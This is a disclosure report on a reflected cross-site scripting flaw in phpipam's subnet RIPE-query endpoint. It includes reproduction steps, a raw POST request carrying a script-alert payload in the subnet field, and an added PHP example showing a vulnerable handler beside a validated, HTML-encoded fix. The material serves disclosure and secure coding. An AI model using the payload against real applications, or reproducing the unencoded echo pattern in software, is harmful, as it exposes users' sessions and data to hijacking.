Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
Jan 28th 2022
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off a web application into the victim's browser. The script is delivered through a link that sends a request to a vulnerable page, which then echoes the script back so that it executes in the victim's browser. The vulnerability is typically the result of incoming request parameters not being sufficiently validated or encoded, which allows an attacker to manipulate the web application's functions and execute malicious scripts in the context of the application.
Proof of Concept
Steps to Reproduce:
1. Log in to the web app using admin credentials.
2. Navigate to Subnets: http://localhost/phpipam/index.php?page=subnets&section=1
3. Choose any subnet and click Edit.
4. Click the "Get Information" button next to the Subnet input field, capture the request with a proxy tool, and change the subnet IP to the XSS payload, as in the POST request below:
=======================================================================================
POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1
Host: localhost
Content-Length: 47
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0;
Connection: close

subnet=<script>alert(document.domain);</script>
=======================================================================================
Impact
An attacker who tricks a logged-in user into opening the crafted link can perform any action within the application that the user can perform, view any information that the user is able to view, modify any information that the user is able to modify, and initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
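The root cause is a POST parameter (`subnet`) reflected into the response without validation or output encoding. The following is an added example, not phpipam's own code: a hypothetical handler in the project's language shown first in a vulnerable form and then hardened by validating the value as an IPv4/IPv6 address with an optional prefix length and HTML-encoding it on output. The function names and HTML markup are assumptions.

```php
<?php
// Added example (not phpipam's code): a hypothetical endpoint that echoes
// the POSTed `subnet` value into an HTML fragment, vulnerable vs. hardened.

// Vulnerable: the raw parameter is concatenated into HTML, so
// subnet=<script>alert(document.domain);</script> is returned verbatim.
function render_subnet_vulnerable(string $subnet): string {
    return "<div class='ripe'>Query for " . $subnet . "</div>";
}

// Accepts only an IPv4/IPv6 address with an optional prefix length,
// e.g. "10.0.0.0/8" or "2001:db8::/32"; everything else is rejected.
function is_valid_subnet(string $subnet): bool {
    $parts = explode('/', $subnet, 2);
    $ip = $parts[0];
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        $maxPrefix = 32;
    } elseif (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false) {
        $maxPrefix = 128;
    } else {
        return false;
    }
    if (count($parts) === 1) {
        return true;
    }
    // Prefix length must be 1-3 decimal digits within range for the family.
    return preg_match('/^\d{1,3}$/', $parts[1]) === 1 && (int)$parts[1] <= $maxPrefix;
}

// Hardened: validate first, then HTML-encode on output so that even a value
// which slips past validation cannot break out of the text context.
function render_subnet_hardened(string $subnet): string {
    if (!is_valid_subnet($subnet)) {
        return "<div class='ripe error'>Invalid subnet</div>";
    }
    $safe = htmlspecialchars($subnet, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class='ripe'>Query for " . $safe . "</div>";
}

// Constructed inputs exercising both paths, including the report's payload.
$inputs = ['10.0.0.0/8', '2001:db8::/32', '<script>alert(document.domain);</script>'];
foreach ($inputs as $in) {
    echo "vulnerable: " . render_subnet_vulnerable($in) . PHP_EOL;
    echo "hardened:   " . render_subnet_hardened($in) . PHP_EOL;
}
```

Validation alone is not sufficient as a defence: the `htmlspecialchars` call is what guarantees the reflected value is treated as text by the browser, whatever reaches it.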